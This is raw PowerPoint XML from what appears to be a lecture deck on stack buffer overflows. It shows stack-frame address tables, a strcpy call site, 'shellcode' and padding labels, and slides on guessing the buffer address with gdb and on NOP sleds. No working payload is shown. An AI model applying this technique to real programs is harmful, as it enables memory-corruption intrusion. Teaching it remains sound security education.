        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2069820465"/>
              </p:ext>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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xa</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0xbffff67c</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>8048420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80482d0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483fd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483fe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048400</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048403</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048406</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048409</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048412</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048415</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048420</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>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0xbffff678</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946820" y="338066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0xbffff63c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940826" y="3038035"/>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0xbffff640</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2964404" y="25559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0xbffff646</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4765239" y="387829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Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479672" y="2279172"/>
            <a:ext cx="2831284" cy="457048"/>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shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479672" y="1765142"/>
            <a:ext cx="2831284" cy="51403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a * 29</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1521476976"/>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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff714</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff646</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff861</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff646</a:t>
                      </a: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231</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="42485" y="10110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0xbffff67c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1291851701"/>
              </p:ext>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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xa</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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff67c</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0xbffff646</a:t>
                      </a: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80482d0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483fd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483fe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048400</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048403</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048406</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048409</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048412</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048415</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048420</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>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0xbffff678</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946820" y="338066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0xbffff63c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940826" y="3038035"/>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0xbffff640</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2964404" y="25559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0xbffff646</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3427405" y="270443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Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479672" y="2279172"/>
            <a:ext cx="2831284" cy="457048"/>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shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479672" y="1765142"/>
            <a:ext cx="2831284" cy="51403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a * 29</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1006143" y="784354"/>
            <a:ext cx="6815751" cy="3813706"/>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mr-IN" sz="4000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="73486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8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Guessing the Buffer Address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="548869" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In most cases the address of the buffer is not known</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It has to be “guessed” (and the guess must be VERY precise)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The stack address of a program can be obtained by using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assumption: No stack randomization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Given the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>same environment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and knowing the size of command-line parameters, the address of the stack can be roughly guessed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We also have to guess the offset of the buffer with respect to the stack pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="56427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886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886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886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886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886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886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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NOP Sled</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550915" name="Rectangle 3" descr="Wave"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3733800" y="4400550"/>
            <a:ext cx="3276600" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wave">
            <a:fgClr>
              <a:schemeClr val="accent2"/>
            </a:fgClr>
            <a:bgClr>
              <a:schemeClr val="bg1"/>
            </a:bgClr>
          </a:pattFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Almost the buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550916" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="4400550"/>
            <a:ext cx="2971800" cy="40005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solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550917" name="Rectangle 5"/>
          <p:cNvSpPr>
